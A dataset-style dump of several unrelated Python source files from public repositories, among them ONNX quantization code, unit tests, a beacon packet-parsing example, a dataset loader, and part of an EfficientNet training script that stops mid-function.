max_stars_repo_path (string, length 4–245) | max_stars_repo_name (string, length 7–115) | max_stars_count (int64, 101–368k) | id (string, length 2–8) | content (string, length 6–1.03M)
---|---|---|---|---
pycell/prologue/native/set_.py | andybalaam/cell | 118 | 15568 |
def _do_set(env, name, value):
if env.contains(name):
env.set(name, value)
elif env.parent is not None:
_do_set(env.parent, name, value)
else:
raise Exception(
"Attempted to set name '%s' but it does not exist." %
name
)
def set_(env, symbol_name, value):
if symbol_name[0] != "string":
raise Exception(
"set() takes a string as its first argument, but was: %s" %
str(symbol_name)
)
_do_set(env, symbol_name[1], value)
return value
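# --- Illustrative usage sketch (not part of the original Cell module) ---
# _FakeEnv is a hypothetical stand-in exposing only the contains/set/parent
# interface that _do_set relies on; Cell's real environment class may differ.
# It shows how set_ walks up enclosing scopes to assign an existing name.
class _FakeEnv:
    def __init__(self, parent=None):
        self.parent = parent
        self.items = {}

    def contains(self, name):
        return name in self.items

    def set(self, name, value):
        self.items[name] = value


if __name__ == "__main__":
    root = _FakeEnv()
    child = _FakeEnv(parent=root)
    root.set("x", 1)                  # "x" is defined in the outer scope
    set_(child, ["string", "x"], 42)  # the symbol arrives as a ("string", name) pair
    assert root.items["x"] == 42      # the assignment walked up to the defining scope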
|
onnxruntime/python/tools/quantization/operators/qdq_base_operator.py | mszhanyi/onnxruntime | 669 | 15589 |
import itertools
from ..quant_utils import QuantizedValue, QuantizedValueType, attribute_to_kwarg, quantize_nparray
from .base_operator import QuantOperatorBase
class QDQOperatorBase:
def __init__(self, onnx_quantizer, onnx_node):
self.quantizer = onnx_quantizer
self.node = onnx_node
        self.disable_qdq_for_node_output = (
            onnx_node.op_type in onnx_quantizer.op_types_to_exclude_output_quantization
        )
def quantize(self):
node = self.node
if self.disable_qdq_for_node_output:
tensors_to_quantize = node.input
else:
tensors_to_quantize = itertools.chain(node.input, node.output)
for tensor_name in tensors_to_quantize:
self.quantizer.quantize_tensor(tensor_name)
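# --- Illustrative sketch (not part of onnxruntime) ---
# _StubQuantizer and _StubNode are hypothetical stand-ins that mimic only the
# attributes QDQOperatorBase touches. Because of the relative imports at the
# top of this module, treat this as documentation of the tensor-selection
# behaviour rather than a directly runnable script.
class _StubQuantizer:
    op_types_to_exclude_output_quantization = ["ArgMax"]  # assumed exclusion list

    def __init__(self):
        self.quantized = []

    def quantize_tensor(self, tensor_name):
        self.quantized.append(tensor_name)


class _StubNode:
    def __init__(self, op_type, inputs, outputs):
        self.op_type = op_type
        self.input = inputs
        self.output = outputs


def _example_qdq_tensor_selection():
    quantizer = _StubQuantizer()
    conv = _StubNode("Conv", inputs=["x", "w"], outputs=["y"])
    QDQOperatorBase(quantizer, conv).quantize()
    # Conv is not excluded, so inputs and outputs are quantized: ['x', 'w', 'y'].
    # An "ArgMax" node would have only its inputs quantized.
    return quantizer.quantized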
|
tests/integration/testdata/buildcmd/PyLayerMake/layer.py | renanmontebelo/aws-sam-cli | 2,959 | 15615 | import numpy
def layer_method():
return {"pi": "{0:.2f}".format(numpy.pi)}
|
test/test_i18n.py | timgates42/uliweb | 202 | 15636 |
from uliweb.i18n import ugettext_lazy as _
def test_1():
"""
>>> x = _('Hello')
>>> print repr(x)
ugettext_lazy('Hello')
"""
def test_2():
    """
    >>> x = _('Hello {0}')
    >>> print x.format('name')
    Hello name
    """
 |
f5/bigip/tm/vcmp/test/unit/test_virtual_disk.py | nghia-tran/f5-common-python | 272 | 15646 |
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import mock
import pytest
from f5.bigip.tm.vcmp.virtual_disk import Virtual_Disk
from f5.sdk_exception import UnsupportedMethod
@pytest.fixture
def FakeResource():
mo = mock.MagicMock()
return Virtual_Disk(mo)
def test_create(FakeResource):
with pytest.raises(UnsupportedMethod) as ex:
FakeResource.create()
assert "does not support the create method" in str(ex.value)
def test_update(FakeResource):
with pytest.raises(UnsupportedMethod) as ex:
FakeResource.update()
assert "does not support the update method" in str(ex.value)
def test_modify(FakeResource):
with pytest.raises(UnsupportedMethod) as ex:
FakeResource.modify()
assert "does not support the modify method" in str(ex.value)
|
datatest/main.py | ajhynes7/datatest | 277 | 15657 | """Datatest main program"""
import sys as _sys
from unittest import TestProgram as _TestProgram
from unittest import defaultTestLoader as _defaultTestLoader
try:
from unittest.signals import installHandler
except ImportError:
installHandler = None
from datatest import DataTestRunner
__unittest = True
__datatest = True
class DataTestProgram(_TestProgram):
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=DataTestRunner, testLoader=_defaultTestLoader,
exit=True, verbosity=1, failfast=None, catchbreak=None,
buffer=None, ignore=False):
self.ignore = ignore
_TestProgram.__init__(self,
module=module,
defaultTest=defaultTest,
argv=argv,
testRunner=testRunner,
testLoader=testLoader,
exit=exit,
verbosity=verbosity,
failfast=failfast,
catchbreak=catchbreak,
buffer=buffer)
def runTests(self):
try:
if self.catchbreak and installHandler:
installHandler()
except AttributeError:
pass # does not have catchbreak attribute
if self.testRunner is None:
self.testRunner = DataTestRunner
if isinstance(self.testRunner, type):
try:
kwds = ['verbosity', 'failfast', 'buffer', 'warnings', 'ignore']
kwds = [attr for attr in kwds if hasattr(self, attr)]
kwds = dict((attr, getattr(self, attr)) for attr in kwds)
testRunner = self.testRunner(**kwds)
except TypeError:
if 'warnings' in kwds:
del kwds['warnings']
testRunner = self.testRunner(**kwds)
else:
# assumed to be a TestRunner instance
testRunner = self.testRunner
self.result = testRunner.run(self.test)
if self.exit:
_sys.exit(not self.result.wasSuccessful())
if _sys.version_info[:2] == (3, 1): # Patch methods for Python 3.1.
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=DataTestRunner, testLoader=_defaultTestLoader,
exit=True, ignore=False):
self.ignore = ignore
_TestProgram.__init__(self,
module=module,
defaultTest=defaultTest,
argv=argv,
testRunner=testRunner,
testLoader=testLoader,
exit=exit)
DataTestProgram.__init__ = __init__
elif _sys.version_info[:2] == (2, 6): # Patch runTests() for Python 2.6.
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=DataTestRunner, testLoader=_defaultTestLoader,
exit=True, ignore=False):
self.exit = exit # <- 2.6 does not handle exit argument.
self.ignore = ignore
_TestProgram.__init__(self,
module=module,
defaultTest=defaultTest,
argv=argv,
testRunner=testRunner,
testLoader=testLoader)
DataTestProgram.__init__ = __init__
main = DataTestProgram
|
observations/r/chest_sizes.py | hajime9652/observations | 199 | 15666 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def chest_sizes(path):
"""Chest measurements of 5738 Scottish Militiamen
Quetelet's data on chest measurements of 5738 Scottish Militiamen.
Quetelet (1846) used this data as a demonstration of the normal
distribution of physical characteristics.
A data frame with 16 observations on the following 2 variables.
`chest`
Chest size (in inches)
`count`
Number of soldiers with this chest size
<NAME>. and <NAME>. (1981). *Applications, Basics, and
Computing of Exploratory Data Analysis*. Belmont. CA: Wadsworth.
Retrieved from Statlib:
`https://www.stat.cmu.edu/StatDat/Datafiles/MilitiamenChests.html`
Args:
path: str.
      Path to the directory where the file is stored, or into which it will
      be downloaded and extracted.
Filename is `chest_sizes.csv`.
Returns:
Tuple of np.ndarray `x_train` with 16 rows and 2 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'chest_sizes.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/HistData/ChestSizes.csv'
maybe_download_and_extract(path, url,
save_file_name='chest_sizes.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
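# --- Hedged usage sketch (not part of the original module) ---
# The directory below is a placeholder; the snippet only illustrates the
# return contract documented in the docstring above.
if __name__ == '__main__':
  x_train, metadata = chest_sizes('~/data')
  print(x_train.shape)              # expected (16, 2): chest size and count
  print(list(metadata['columns']))  # expected ['chest', 'count']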
|
examples/parser_example.py | pibico/beacontools | 139 | 15676 |
# -*- coding: utf-8 -*-
from beacontools import parse_packet
# Eddystone UID packet
uid_packet = b"\x02\x01\x06\x03\x03\xaa\xfe\x17\x16\xaa\xfe\x00\xe3\x12\x34\x56\x78\x90\x12" \
b"\x34\x67\x89\x01\x00\x00\x00\x00\x00\x01\x00\x00"
uid_frame = parse_packet(uid_packet)
print("Namespace: %s" % uid_frame.namespace)
print("Instance: %s" % uid_frame.instance)
print("TX Power: %s" % uid_frame.tx_power)
print("-----")
# Eddystone URL packet
url_packet = b"\x03\x03\xAA\xFE\x13\x16\xAA\xFE\x10\xF8\x03github\x00citruz"
url_frame = parse_packet(url_packet)
print("TX Power: %d" % url_frame.tx_power)
print("URL: %s" % url_frame.url)
print("-----")
# Eddystone TLM packet (unencrypted)
tlm_packet = b"\x02\x01\x06\x03\x03\xaa\xfe\x11\x16\xaa\xfe\x20\x00\x0b\x18\x13\x00\x00\x00" \
b"\x14\x67\x00\x00\x2a\xc4\xe4"
tlm_frame = parse_packet(tlm_packet)
print("Voltage: %d mV" % tlm_frame.voltage)
print("Temperature: %f °C" % tlm_frame.temperature)
print("Advertising count: %d" % tlm_frame.advertising_count)
print("Seconds since boot: %d" % tlm_frame.seconds_since_boot)
print("-----")
# Eddystone TLM packet (encrypted)
enc_tlm_packet = b"\x02\x01\x06\x03\x03\xaa\xfe\x11\x16\xaa\xfe\x20\x01\x41\x41\x41\x41\x41" \
b"\x41\x41\x41\x41\x41\x41\x41\xDE\xAD\xBE\xFF"
enc_tlm_frame = parse_packet(enc_tlm_packet)
print("Data: %s" % enc_tlm_frame.encrypted_data)
print("Salt: %d" % enc_tlm_frame.salt)
print("Mic: %d" % enc_tlm_frame.mic)
print("-----")
# iBeacon Advertisement
ibeacon_packet = b"\x02\x01\x06\x1a\xff\x4c\x00\x02\x15\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
b"\x41\x41\x41\x41\x41\x41\x41\x00\x01\x00\x01\xf8"
adv = parse_packet(ibeacon_packet)
print("UUID: %s" % adv.uuid)
print("Major: %d" % adv.major)
print("Minor: %d" % adv.minor)
print("TX Power: %d" % adv.tx_power)
print("-----")
# Cypress iBeacon Sensor
cypress_packet = b"\x02\x01\x04\x1a\xff\x4c\x00\x02\x15\x00\x05\x00\x01\x00\x00\x10\x00\x80" \
b"\x00\x00\x80\x5f\x9b\x01\x31\x00\x02\x6c\x66\xc3"
sensor = parse_packet(cypress_packet)
print("UUID: %s" % sensor.uuid)
print("Major: %d" % sensor.major)
print("Temperature: %d °C" % sensor.cypress_temperature)
print("Humidity: %d %%" % sensor.cypress_humidity)
print("TX Power: %d" % sensor.tx_power)
print("-----")
# Estimote Telemetry Packet (Subframe A)
telemetry_a_packet = b"\x02\x01\x04\x03\x03\x9a\xfe\x17\x16\x9a\xfe\x22\x47\xa0\x38\xd5"\
b"\xeb\x03\x26\x40\x00\x00\x01\x41\x44\x47\xfa\xff\xff\xff\xff"
telemetry = parse_packet(telemetry_a_packet)
print("Identifier: %s" % telemetry.identifier)
print("Protocol Version: %d" % telemetry.protocol_version)
print("Acceleration (g): (%f, %f, %f)" % telemetry.acceleration)
print("Is moving: %s" % telemetry.is_moving)
# ... see packet_types/estimote.py for all available attributes and units
print("-----")
# Estimote Telemetry Packet (Subframe B)
telemetry_b_packet = b"\x02\x01\x04\x03\x03\x9a\xfe\x17\x16\x9a\xfe\x22\x47\xa0\x38\xd5"\
b"\xeb\x03\x26\x40\x01\xd8\x42\xed\x73\x49\x25\x66\xbc\x2e\x50"
telemetry_b = parse_packet(telemetry_b_packet)
print("Identifier: %s" % telemetry_b.identifier)
print("Protocol Version: %d" % telemetry_b.protocol_version)
print("Magnetic field: (%f, %f, %f)" % telemetry_b.magnetic_field)
print("Temperature: %f °C" % telemetry_b.temperature)
# ... see packet_types/estimote.py for all available attributes and units
# Estimote Nearable Advertisement
nearable_packet = b"\x02\x01\x04\x03\x03\x0f\x18\x17\xff\x5d" \
b"\x01\x01\x1e\xfe\x42\x7e\xb6\xf4\xbc\x2f" \
b"\x04\x01\x68\xa1\xaa\xfe\x05\xc1\x45\x25" \
b"\x53\xb5"
nearable_adv = parse_packet(nearable_packet)
print("Identifier: %s" % nearable_adv.identifier)
print("Hardware_version: %d" % nearable_adv.hardware_version)
print("Firmware_version: %d" % nearable_adv.firmware_version)
print("Temperature: %d" % nearable_adv.temperature)
print("Is moving: %i" % nearable_adv.is_moving)
print("-----")
# CJ Monitor packet
cj_monitor_packet = b"\x02\x01\x06\x05\x02\x1A\x18\x00\x18" \
b"\x09\xFF\x72\x04\xFE\x10\xD1\x0C\x33\x61" \
b"\x09\x09\x4D\x6F\x6E\x20\x35\x36\x34\x33"
cj_monitor = parse_packet(cj_monitor_packet)
print("Name: %s" % cj_monitor.name)
print("Temperature: %f °C" % cj_monitor.temperature)
print("Humidity: %d %%" % cj_monitor.humidity)
print("Light: %f" % cj_monitor.light)
|
classification/train_classifier_tf.py | dnarqq/WildHack | 402 | 15715 | r"""Train an EfficientNet classifier.
Currently, the implementation of multi-label multi-class classification is
non-functional.
During training, start tensorboard from within the classification/ directory:
tensorboard --logdir run --bind_all --samples_per_plugin scalars=0,images=0
Example usage:
python train_classifier_tf.py run_idfg /ssd/crops_sq \
-m "efficientnet-b0" --pretrained --finetune --label-weighted \
--epochs 50 --batch-size 512 --lr 1e-4 \
--seed 123 \
--logdir run_idfg
"""
from __future__ import annotations
import argparse
from collections import defaultdict
from collections.abc import Callable, Mapping, MutableMapping, Sequence
from datetime import datetime
import json
import os
from typing import Any, Optional
import uuid
import numpy as np
import sklearn.metrics
import tensorflow as tf
from tensorboard.plugins.hparams import api as hp
import tqdm
from classification.train_utils import (
HeapItem, recall_from_confusion_matrix, add_to_heap, fig_to_img,
imgs_with_confidences, load_dataset_csv, prefix_all_keys)
from visualization import plot_utils
AUTOTUNE = tf.data.experimental.AUTOTUNE
# match pytorch EfficientNet model names
EFFICIENTNET_MODELS: Mapping[str, Mapping[str, Any]] = {
'efficientnet-b0': dict(cls='EfficientNetB0', img_size=224, dropout=0.2),
'efficientnet-b1': dict(cls='EfficientNetB1', img_size=240, dropout=0.2),
'efficientnet-b2': dict(cls='EfficientNetB2', img_size=260, dropout=0.3),
'efficientnet-b3': dict(cls='EfficientNetB3', img_size=300, dropout=0.3),
'efficientnet-b4': dict(cls='EfficientNetB4', img_size=380, dropout=0.4),
'efficientnet-b5': dict(cls='EfficientNetB5', img_size=456, dropout=0.4),
'efficientnet-b6': dict(cls='EfficientNetB6', img_size=528, dropout=0.5),
'efficientnet-b7': dict(cls='EfficientNetB7', img_size=600, dropout=0.5)
}
def create_dataset(
img_files: Sequence[str],
labels: Sequence[Any],
sample_weights: Optional[Sequence[float]] = None,
img_base_dir: str = '',
transform: Optional[Callable[[tf.Tensor], Any]] = None,
target_transform: Optional[Callable[[Any], Any]] = None,
cache: bool | str = False
) -> tf.data.Dataset:
"""Create a tf.data.Dataset.
The dataset returns elements (img, label, img_file, sample_weight) if
sample_weights is not None, or (img, label, img_file) if
sample_weights=None.
img: tf.Tensor, shape [H, W, 3], type uint8
label: tf.Tensor
img_file: tf.Tensor, scalar, type str
sample_weight: tf.Tensor, scalar, type float32
Possible TODO: oversample the imbalanced classes
see tf.data.experimental.sample_from_datasets
Args:
img_files: list of str, relative paths from img_base_dir
labels: list of int if multilabel=False
sample_weights: optional list of float
img_base_dir: str, base directory for images
transform: optional transform to apply to a single uint8 JPEG image
target_transform: optional transform to apply to a single label
cache: bool or str, cache images in memory if True, cache images to
a file on disk if a str
Returns: tf.data.Dataset
"""
# images dataset
img_ds = tf.data.Dataset.from_tensor_slices(img_files)
img_ds = img_ds.map(lambda p: tf.io.read_file(img_base_dir + os.sep + p),
num_parallel_calls=AUTOTUNE)
# for smaller disk / memory usage, we cache the raw JPEG bytes instead
# of the decoded Tensor
if isinstance(cache, str):
img_ds = img_ds.cache(cache)
elif cache:
img_ds = img_ds.cache()
# convert JPEG bytes to a 3D uint8 Tensor
# keras EfficientNet already includes normalization from [0, 255] to [0, 1],
# so we don't need to do that here
img_ds = img_ds.map(lambda img: tf.io.decode_jpeg(img, channels=3))
if transform:
img_ds = img_ds.map(transform, num_parallel_calls=AUTOTUNE)
# labels dataset
labels_ds = tf.data.Dataset.from_tensor_slices(labels)
if target_transform:
labels_ds = labels_ds.map(target_transform, num_parallel_calls=AUTOTUNE)
# img_files dataset
img_files_ds = tf.data.Dataset.from_tensor_slices(img_files)
if sample_weights is None:
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds))
# weights dataset
weights_ds = tf.data.Dataset.from_tensor_slices(sample_weights)
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds, weights_ds))
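# --- Hedged usage sketch (not part of the original script) ---
# The file names and base directory below are placeholders; the helper only
# illustrates the (img, label, img_file) element structure documented above.
def _example_create_dataset() -> None:
    ds = create_dataset(
        img_files=['cat.jpg', 'dog.jpg'],
        labels=[0, 1],
        img_base_dir='/path/to/crops')
    for img, label, img_file in ds.take(1):
        print(img.shape, int(label), img_file.numpy().decode())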
def create_dataloaders(
dataset_csv_path: str,
label_index_json_path: str,
splits_json_path: str,
cropped_images_dir: str,
img_size: int,
multilabel: bool,
label_weighted: bool,
weight_by_detection_conf: bool | str,
batch_size: int,
augment_train: bool,
cache_splits: Sequence[str]
) -> tuple[dict[str, tf.data.Dataset], list[str]]:
"""
Args:
dataset_csv_path: str, path to CSV file with columns
['dataset', 'location', 'label'], where label is a comma-delimited
list of labels
splits_json_path: str, path to JSON file
augment_train: bool, whether to shuffle/augment the training set
cache_splits: list of str, splits to cache
training set is cached at /mnt/tempds/random_file_name
validation and test sets are cached in memory
Returns:
datasets: dict, maps split to DataLoader
label_names: list of str, label names in order of label id
"""
df, label_names, split_to_locs = load_dataset_csv(
dataset_csv_path, label_index_json_path, splits_json_path,
multilabel=multilabel, label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf)
# define the transforms
# efficientnet data preprocessing:
# - train:
# 1) random crop: aspect_ratio_range=(0.75, 1.33), area_range=(0.08, 1.0)
# 2) bicubic resize to img_size
# 3) random horizontal flip
# - test:
# 1) center crop
# 2) bicubic resize to img_size
@tf.function
def train_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
img = tf.image.random_flip_left_right(img)
img = tf.image.random_brightness(img, max_delta=0.25)
img = tf.image.random_contrast(img, lower=0.75, upper=1.25)
img = tf.image.random_saturation(img, lower=0.75, upper=1.25)
return img
@tf.function
def test_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
return img
dataloaders = {}
for split, locs in split_to_locs.items():
is_train = (split == 'train') and augment_train
split_df = df[df['dataset_location'].isin(locs)]
weights = None
if label_weighted or weight_by_detection_conf:
            # weights sum to:
# - if weight_by_detection_conf: (# images in split - conf delta)
# - otherwise: (# images in split)
weights = split_df['weights'].tolist()
if not weight_by_detection_conf:
assert np.isclose(sum(weights), len(split_df))
cache: bool | str = (split in cache_splits)
if split == 'train' and 'train' in cache_splits:
unique_filename = str(uuid.uuid4())
os.makedirs('/mnt/tempds/', exist_ok=True)
cache = f'/mnt/tempds/{unique_filename}'
ds = create_dataset(
img_files=split_df['path'].tolist(),
labels=split_df['label_index'].tolist(),
sample_weights=weights,
img_base_dir=cropped_images_dir,
transform=train_transform if is_train else test_transform,
target_transform=None,
cache=cache)
if is_train:
ds = ds.shuffle(1000, reshuffle_each_iteration=True)
ds = ds.batch(batch_size).prefetch(buffer_size=AUTOTUNE)
dataloaders[split] = ds
return dataloaders, label_names
def build_model(model_name: str, num_classes: int, img_size: int,
pretrained: bool, finetune: bool) -> tf.keras.Model:
"""Creates a model with an EfficientNet base."""
class_name = EFFICIENTNET_MODELS[model_name]['cls']
dropout = EFFICIENTNET_MODELS[model_name]['dropout']
model_class = tf.keras.applications.__dict__[class_name]
weights = 'imagenet' if pretrained else None
inputs = tf.keras.layers.Input(shape=(img_size, img_size, 3))
base_model = model_class(
input_tensor=inputs, weights=weights, include_top=False, pooling='avg')
if finetune:
# freeze the base model's weights, including BatchNorm statistics
# https://www.tensorflow.org/guide/keras/transfer_learning#fine-tuning
base_model.trainable = False
# rebuild output
x = tf.keras.layers.Dropout(dropout, name='top_dropout')(base_model.output)
outputs = tf.keras.layers.Dense(
num_classes,
kernel_initializer=tf.keras.initializers.VarianceScaling(
scale=1. / 3., mode='fan_out', distribution='uniform'),
name='logits')(x)
model = tf.keras.Model(inputs, outputs, name='complete_model')
model.base_model = base_model # cache this so that we can turn off finetune
return model
def main(dataset_dir: str,
cropped_images_dir: str,
multilabel: bool,
model_name: str,
pretrained: bool,
finetune: int,
label_weighted: bool,
weight_by_detection_conf: bool | str,
epochs: int,
batch_size: int,
lr: float,
weight_decay: float,
seed: Optional[int] = None,
logdir: str = '',
cache_splits: Sequence[str] = ()) -> None:
"""Main function."""
# input validation
assert os.path.exists(dataset_dir)
assert os.path.exists(cropped_images_dir)
if isinstance(weight_by_detection_conf, str):
assert os.path.exists(weight_by_detection_conf)
# set seed
seed = np.random.randint(10_000) if seed is None else seed
np.random.seed(seed)
tf.random.set_seed(seed)
# create logdir and save params
params = dict(locals()) # make a copy
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') # '20200722_110816'
logdir = os.path.join(logdir, timestamp)
os.makedirs(logdir, exist_ok=True)
print('Created logdir:', logdir)
with open(os.path.join(logdir, 'params.json'), 'w') as f:
json.dump(params, f, indent=1)
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
img_size = EFFICIENTNET_MODELS[model_name]['img_size']
# create dataloaders and log the index_to_label mapping
loaders, label_names = create_dataloaders(
dataset_csv_path=os.path.join(dataset_dir, 'classification_ds.csv'),
label_index_json_path=os.path.join(dataset_dir, 'label_index.json'),
splits_json_path=os.path.join(dataset_dir, 'splits.json'),
cropped_images_dir=cropped_images_dir,
img_size=img_size,
multilabel=multilabel,
label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf,
batch_size=batch_size,
augment_train=True,
cache_splits=cache_splits)
writer = tf.summary.create_file_writer(logdir)
writer.set_as_default()
model = build_model(
model_name, num_classes=len(label_names), img_size=img_size,
pretrained=pretrained, finetune=finetune > 0)
# define loss function and optimizer
loss_fn: tf.keras.losses.Loss
if multilabel:
loss_fn = tf.keras.losses.BinaryCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
else:
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
# using EfficientNet training defaults
# - batch norm momentum: 0.99
# - optimizer: RMSProp, decay 0.9 and momentum 0.9
# - epochs: 350
# - learning rate: 0.256, decays by 0.97 every 2.4 epochs
# - weight decay: 1e-5
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
lr, decay_steps=1, decay_rate=0.97, staircase=True)
optimizer = tf.keras.optimizers.RMSprop(
learning_rate=lr, rho=0.9, momentum=0.9)
best_epoch_metrics: dict[str, float] = {}
for epoch in range(epochs):
print(f'Epoch: {epoch}')
optimizer.learning_rate = lr_schedule(epoch)
tf.summary.scalar('lr', optimizer.learning_rate, epoch)
if epoch > 0 and finetune == epoch:
print('Turning off fine-tune!')
model.base_model.trainable = True
print('- train:')
# TODO: change weighted to False if oversampling minority classes
train_metrics, train_heaps, train_cm = run_epoch(
model, loader=loaders['train'], weighted=label_weighted,
loss_fn=loss_fn, weight_decay=weight_decay, optimizer=optimizer,
finetune=finetune > epoch, return_extreme_images=True)
train_metrics = prefix_all_keys(train_metrics, prefix='train/')
log_run('train', epoch, writer, label_names,
metrics=train_metrics, heaps=train_heaps, cm=train_cm)
print('- val:')
val_metrics, val_heaps, val_cm = run_epoch(
model, loader=loaders['val'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
val_metrics = prefix_all_keys(val_metrics, prefix='val/')
log_run('val', epoch, writer, label_names,
metrics=val_metrics, heaps=val_heaps, cm=val_cm)
if val_metrics['val/acc_top1'] > best_epoch_metrics.get('val/acc_top1', 0): # pylint: disable=line-too-long
filename = os.path.join(logdir, f'ckpt_{epoch}.h5')
print(f'New best model! Saving checkpoint to {filename}')
model.save(filename)
best_epoch_metrics.update(train_metrics)
best_epoch_metrics.update(val_metrics)
best_epoch_metrics['epoch'] = epoch
print('- test:')
test_metrics, test_heaps, test_cm = run_epoch(
model, loader=loaders['test'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
test_metrics = prefix_all_keys(test_metrics, prefix='test/')
log_run('test', epoch, writer, label_names,
metrics=test_metrics, heaps=test_heaps, cm=test_cm)
# stop training after 8 epochs without improvement
if epoch >= best_epoch_metrics['epoch'] + 8:
break
hparams_dict = {
'model_name': model_name,
'multilabel': multilabel,
'finetune': finetune,
'batch_size': batch_size,
'epochs': epochs
}
hp.hparams(hparams_dict)
writer.close()
def log_run(split: str, epoch: int, writer: tf.summary.SummaryWriter,
label_names: Sequence[str], metrics: MutableMapping[str, float],
heaps: Mapping[str, Mapping[int, list[HeapItem]]], cm: np.ndarray
) -> None:
"""Logs the outputs (metrics, confusion matrix, tp/fp/fn images) from a
single epoch run to Tensorboard.
Args:
metrics: dict, keys already prefixed with {split}/
"""
per_class_recall = recall_from_confusion_matrix(cm, label_names)
metrics.update(prefix_all_keys(per_class_recall, f'{split}/label_recall/'))
# log metrics
for metric, value in metrics.items():
tf.summary.scalar(metric, value, epoch)
# log confusion matrix
cm_fig = plot_utils.plot_confusion_matrix(cm, classes=label_names,
normalize=True)
cm_fig_img = tf.convert_to_tensor(fig_to_img(cm_fig)[np.newaxis, ...])
tf.summary.image(f'confusion_matrix/{split}', cm_fig_img, step=epoch)
# log tp/fp/fn images
for heap_type, heap_dict in heaps.items():
log_images_with_confidence(heap_dict, label_names, epoch=epoch,
tag=f'{split}/{heap_type}')
writer.flush()
def log_images_with_confidence(
heap_dict: Mapping[int, list[HeapItem]],
label_names: Sequence[str],
epoch: int,
tag: str) -> None:
"""
Args:
heap_dict: dict, maps label_id to list of HeapItem, where each HeapItem
data is a list [img, target, top3_conf, top3_preds, img_file],
and img is a tf.Tensor of shape [H, W, 3]
label_names: list of str, label names in order of label id
epoch: int
tag: str
"""
for label_id, heap in heap_dict.items():
label_name = label_names[label_id]
sorted_heap = sorted(heap, reverse=True) # sort largest to smallest
imgs_list = [item.data for item in sorted_heap]
fig, img_files = imgs_with_confidences(imgs_list, label_names)
# tf.summary.image requires input of shape [N, H, W, C]
fig_img = tf.convert_to_tensor(fig_to_img(fig)[np.newaxis, ...])
tf.summary.image(f'{label_name}/{tag}', fig_img, step=epoch)
tf.summary.text(f'{label_name}/{tag}_files', '\n\n'.join(img_files),
step=epoch)
def track_extreme_examples(tp_heaps: dict[int, list[HeapItem]],
fp_heaps: dict[int, list[HeapItem]],
fn_heaps: dict[int, list[HeapItem]],
inputs: tf.Tensor,
labels: tf.Tensor,
img_files: tf.Tensor,
logits: tf.Tensor) -> None:
"""Updates the 5 most extreme true-positive (tp), false-positive (fp), and
false-negative (fn) examples with examples from this batch.
Each HeapItem's data attribute is a tuple with:
- img: np.ndarray, shape [H, W, 3], type uint8
- label: int
- top3_conf: list of float
- top3_preds: list of float
- img_file: str
Args:
*_heaps: dict, maps label_id (int) to heap of HeapItems
inputs: tf.Tensor, shape [batch_size, H, W, 3], type float32
labels: tf.Tensor, shape [batch_size]
img_files: tf.Tensor, shape [batch_size], type tf.string
logits: tf.Tensor, shape [batch_size, num_classes]
"""
labels = labels.numpy().tolist()
inputs = inputs.numpy().astype(np.uint8)
img_files = img_files.numpy().astype(str).tolist()
batch_probs = tf.nn.softmax(logits, axis=1)
iterable = zip(labels, inputs, img_files, batch_probs)
for label, img, img_file, confs in iterable:
label_conf = confs[label].numpy().item()
top3_conf, top3_preds = tf.math.top_k(confs, k=3, sorted=True)
top3_conf = top3_conf.numpy().tolist()
top3_preds = top3_preds.numpy().tolist()
data = (img, label, top3_conf, top3_preds, img_file)
if top3_preds[0] == label: # true positive
item = HeapItem(priority=label_conf - top3_conf[1], data=data)
add_to_heap(tp_heaps[label], item, k=5)
else:
# false positive for top3_pred[0]
# false negative for label
item = HeapItem(priority=top3_conf[0] - label_conf, data=data)
add_to_heap(fp_heaps[top3_preds[0]], item, k=5)
add_to_heap(fn_heaps[label], item, k=5)
def run_epoch(model: tf.keras.Model,
loader: tf.data.Dataset,
weighted: bool,
top: Sequence[int] = (1, 3),
loss_fn: Optional[tf.keras.losses.Loss] = None,
weight_decay: float = 0,
finetune: bool = False,
optimizer: Optional[tf.keras.optimizers.Optimizer] = None,
return_extreme_images: bool = False
) -> tuple[
dict[str, float],
dict[str, dict[int, list[HeapItem]]],
np.ndarray
]:
"""Runs for 1 epoch.
Args:
model: tf.keras.Model
loader: tf.data.Dataset
weighted: bool, whether to use sample weights in calculating loss and
accuracy
top: tuple of int, list of values of k for calculating top-K accuracy
loss_fn: optional loss function, calculates the mean loss over a batch
